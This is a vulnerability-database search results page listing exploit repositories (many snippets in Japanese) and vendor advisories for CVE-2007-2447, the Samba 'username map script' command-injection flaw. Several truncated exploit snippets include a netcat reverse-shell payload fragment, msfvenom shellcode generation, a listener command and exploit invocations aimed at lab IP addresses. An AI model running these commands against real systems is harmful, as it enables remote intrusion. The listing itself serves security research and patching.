Lucene search
+L

21 matches found

Kitploit
Kitploit
•added 2026/09/25 2:58 p.m.•7 views

metasploitable-pentest-lab

Metasploitable における脆弱性のエクスプロイト 管理された隔離環境に対する実際の攻撃の完全なサイクル: ラボの準備、nmap による偵察、攻撃対象領域の優先順位付け、CVE へのマッピング、Metasploit によるエクスプロイト、ポストエクスプロイテーション、認証情報の抽出とクラッキング、そして SSH キー注入による永続化。 1. 環境の準備 攻撃者 : Kali Linux — msfconsole、nmap、John the Ripper。 標的 : Metasploitable 1 — Ubuntu 8.04(2010年)、パッチ未適用、既知の CVE...

6CVSS8.4AI score0.49759EPSS
SaveExploits18References1
Kitploit
Kitploit
•added 2026/09/24 3:12 p.m.•9 views

smb-usermap

Samba "username map script" コマンド実行 このモジュールは、非デフォルトの "username map script" 設定オプションを使用している場合に、Samba バージョン 3.0.20 から 3.0.25rc3 におけるコマンド実行の脆弱性を悪用します。シェルのメタ文字を含むユーザー名を指定することで、攻撃者は任意のコマンドを実行できます。このオプションは認証前にユーザー名をマップするために使用されるため、この脆弱性を悪用するのに認証は必要ありません。 1. シェルコードを作成 root@kitploit: msfvenom -p...

6AI score
SaveExploits0
Kitploit
Kitploit
•added 2026/09/24 2:03 p.m.•7 views

PyUsernameMapScriptRCE

PyUsernameMapScriptRCE Python で書かれた CVE-2007-2447 エクスプロイト。リバースシェルを取得します。...

6CVSS8.3AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
•added 2026/09/24 1:06 p.m.•6 views

CVE-2007-2447

CVE-2007-2447 - Samba 3.0.20 &1|nc 10.0.0.1 4242 /tmp/f 使い方 root@kitploit: Exploit target 10.129.232.46 on port 445, send back reverse shell to 10.10.14.82 on port 443 python3 CVE-2007-2447.py --rhost 10.129.232.46 --lhost 10.10.14.82 With custom rport and lport python3 CVE-2007-2447.py --rhost...

6CVSS8.5AI score0.49759EPSS
SaveExploits18References1
Kitploit
Kitploit
•added 2026/09/23 4:20 a.m.•10 views

Samba-Exploit-CVE-2007-2447

🎬 このYouTube動画 1️⃣ ターゲットのスキャン Nmap root@kitploit: nmap -sS -sV -p 139,445 192.168.56.102 期待される結果: 139/tcp open netbios-ssn Samba smbd 3.X 445/tcp open microsoft-ds Samba smbd 3.0.20-Debian 👉 Samba バージョン: 3.0.20 これは CVE-2007-2447 に対して脆弱です。 2️⃣ Sambaエクスプロイトの特定 root@kitploit: searchsploit samba 3.0.20...

6CVSS8.4AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
•added 2026/09/22 9:35 a.m.•7 views

CVE-2007-2447

ExploitDev Journey 6 | CVE-2007-2447 | Samba 3.0.20 3.0.25rc 'Username' map script' コマンド実行 オリジナルエクスプロイト: https://www.exploit-db.com/exploits/16320 エクスプロイト名: Samba username map script RCE CVE : 2007-2447 ラボ : Lame - HackTheBox 説明 Samba...

6CVSS8.3AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
•added 2026/09/22 12:54 a.m.•8 views

Samba-CVE-2007-2447-Exploit

Samba CVE-2007-2447 エクスプロイト これは、Sambaサーバにおける「ユーザー名」マップスクリプトコマンド実行として知られる脆弱性CVE-2007-2447を悪用するためのPythonスクリプトです。 説明 このエクスプロイトはSambaバージョン3.x~4.xを対象として開発されています。CVE-2007-2447は、攻撃者が悪意のあるユーザー名とパスワードを作成することで、脆弱なSambaサーバ上で任意のコマンドを実行することを可能にします。 使用方法 1. 攻撃用マシンでリスナーを設定します。例:Netcatを使用: nc -nvlp 1234 2...

6CVSS8.3AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
•added 2026/09/21 11:31 p.m.•5 views

CVE-2007-2447_Samba_3.0.25rc3

CVE-2007-2447 'Username' map script' コマンド実行 3.0.0 - 3.0.25rc3 3.0.20 - 3.0.25rc3 AMRIUNIX...

6CVSS8.3AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
•added 2026/09/20 11:25 p.m.•7 views

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Samba CVE-2007-2447 Exploit(ユーザ名マップスクリプト) このリポジトリには、Sambaサーバ(バージョン3.0.20~3.0.25rc3)における脆弱性 CVE-2007-2447 の悪用を自動化するPythonスクリプトが含まれています。このツールは、教育目的 および許可された侵入テストのためにのみ開発されています。 📝 技術的・学術的説明 「ユーザ名マップスクリプト」 の脆弱性は、Samba設定で username map script オプションが有効になっている場合に、ユーザ名入力のサニタイズが欠如しているために発生します。シェルのメタ文字(バッククォ...

6CVSS8.2AI score0.49759EPSS
SaveExploits18
Kitploit
Kitploit
•added 2026/09/19 10:52 a.m.•8 views

CVE-2007-2447

CVE-2007-2447 - username map script 「Samba 3.0.0から3.0.25rc3のsmbdにおけるMS-RPC機能は、リモートの攻撃者がshellメタ文字を使用して任意のコマンドを実行することを可能にします。これは1 SamrChangePassword関数を含み、smb.confオプション「username map script」が有効な場合に発生します。また、リモートの認証済みユーザーが2 リモートプリンタおよび3 ファイル共有管理における他のMS-RPC関数でshellメタ文字を使用してコマンドを実行することも可能にします。」 エクスプロイト...

6CVSS8.4AI score0.49759EPSS
SaveExploits18
GithubExploit
GithubExploit
•added 2026/04/17 7:48 p.m.•157 views

Exploit for CVE-2007-2447

Samba CVE-2007-2447 Exploit Username Map Script Este reposi...

6CVSS7.3AI score0.49759EPSS
SaveExploits18
GithubExploit
GithubExploit
•added 2026/04/17 7:48 p.m.•126 views

Exploit for CVE-2007-2447

Samba-CVE-2007-244...

6CVSS5.7AI score0.49759EPSS
SaveExploits18
GithubExploit
GithubExploit
•added 2026/04/07 1:48 a.m.•148 views

Exploit for CVE-2007-2447

SMB Samba Exploitation Metasploitable 2 📌 Overview This...

6CVSS7.3AI score0.49759EPSS
SaveExploits18
SUSE CVE
SUSE CVE
•added 2023/02/15 6:12 a.m.•11 views

SUSE CVE-2007-2447

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the 1 SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute...

6CVSS7.6AI score0.49759EPSS
SaveExploits18References7
RedHat Linux
RedHat Linux
•added 2022/01/31 4:42 p.m.•99 views

Critical: Red Hat Security Advisory: samba security and bug fix update

An update for samba is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from the...

9CVSS7.4AI score0.73408EPSS
SaveExploits1References4
OSV
OSV
•added 2022/01/31 3:40 p.m.•38 views

RLSA-2022:0332 Critical: samba security and bug fix update

Samba is an open-source implementation of the Server Message Block SMB protocol and the related Common Internet File System CIFS protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fixes: samba: Out-of-bounds heap read/write vulnerability in VF...

9.9CVSS8AI score0.73408EPSS
SaveExploits1References4
AlmaLinux
AlmaLinux
•added 2022/01/31 3:40 p.m.•67 views

Critical: samba security and bug fix update

Samba is an open-source implementation of the Server Message Block SMB protocol and the related Common Internet File System CIFS protocol, which allow PC-compatible machines to share files, printers, and various information. Security Fixes: samba: Out-of-bounds heap read/write vulnerability in VF...

9CVSS9.1AI score0.73408EPSS
SaveExploits1References1
Tenable Nessus
Tenable Nessus
•added 2012/08/01 12:00 a.m.•49 views

Scientific Linux Security Update : samba on SL5.x, SL4.x, SL3.x i386/x86_64

Various bugs were found in NDR parsing, used to decode MS-RPC requests in Samba. A remote attacker could have sent carefully crafted requests causing a heap overflow, which may have led to the ability to execute arbitrary code on the server. CVE-2007-2446 Unescaped user input parameters were bein...

10CVSS8.5AI score0.77656EPSS
SaveExploits40References3
Prion
Prion
•added 2007/05/14 9:19 p.m.•39 views

Code injection

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the 1 SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute...

6CVSS7.1AI score0.49759EPSS
SaveExploits18References55Affected Software1
OSV
OSV
•added 2007/05/14 9:19 p.m.•13 views

DEBIAN-CVE-2007-2447

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the 1 SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute...

6CVSS9.3AI score0.49759EPSS
SaveExploits18References1
Rows per page
Query Builder